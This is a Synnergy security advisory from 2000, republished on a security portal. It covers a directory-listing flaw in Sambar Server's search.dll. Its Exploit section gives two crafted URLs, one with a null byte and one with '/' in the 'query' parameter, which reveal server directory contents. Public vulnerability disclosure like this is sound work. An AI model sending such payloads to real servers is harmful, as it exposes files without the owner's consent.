[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
 
 discussions
- read forum
- new topic
- search
 

 meetings
- meetings list
- recent additions
- add your info
 
 top 100 sites
- visit top sites
- sign up now
- members
 
 webmasters

- add your url
- add domain
- search box
- link to us

 
 projects
- our projects
- free email
 
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : Sambar Server search cgi vulnerability

Title: Sambar Server search cgi vulnerability
Released by: Synnergy
Date: 15th September 2000
Printable version: Click here
Vulnerable: Sambar Server 4.4 Beta 3

Systems   :     WinNT, Win95 OSR2, (possibly Linux affected)

Product   : http://www.sambar.com

Discovery : dethy@synnergy.net





Discussion

-----------



The Sambar Server comes with a non-caching HTTP proxy server and basic SMTP,

POP3, and IMAP4 proxy servers compiled in.

Sambar was created to test a three-tier communication infrastructure modeled

after the Sybase Open Client/Open Server. Originally developed on a Sun

Workstation (UNIX), it was ported to the PC (Windows 32) and licensed for

commercial purposes.





Vulnerability

-------------



The vulnerability occurs in the search.dll Sambar ISAPI Search shipped with

this product. This dynamic link loader does not check on the 'query' parameter

that is parsed to the server, therefore by constructing a malformed URL

we are able to view the contents of the server, all folders, and files.



Thanks also to USSR Labs (www.ussrback.com) for further testing.



Exploit

-------



All that is needed is a malformed query parameter parsed to the search.dll

file.



http://server-running-sambar.com/search.dll?search?query=%00&logic=AND



.. this will reveal the current working directory contents.





 http://server-running-sambar.com/search.dll?search?query=/&logic=AND



.. this will reveal the root dir of the server.





Solution

--------



The vendor [ tod@sambar.com ] of Sambar Technologies has been contacted, so

wait until a

patched version comes out.





Disclaimer

----------



Synnergy Networks may not be held liable for the use and/or potential effects

of these

programs or advisories, nor the content contained within. Use them at your

own risk.





Contact

-------

E-Mail : dethy@synnergy.net

Web : http://www.synnergy.net



--

Met vriendelijke groet / Kind regards,



| Guido Bakker 

| Network Manager



MainNet BV, http://www.mainnet.nl

Phone: +31 (0)20 6133505

Fax: +31 (0)20 6135640








(C) 1999-2000 All rights reserved.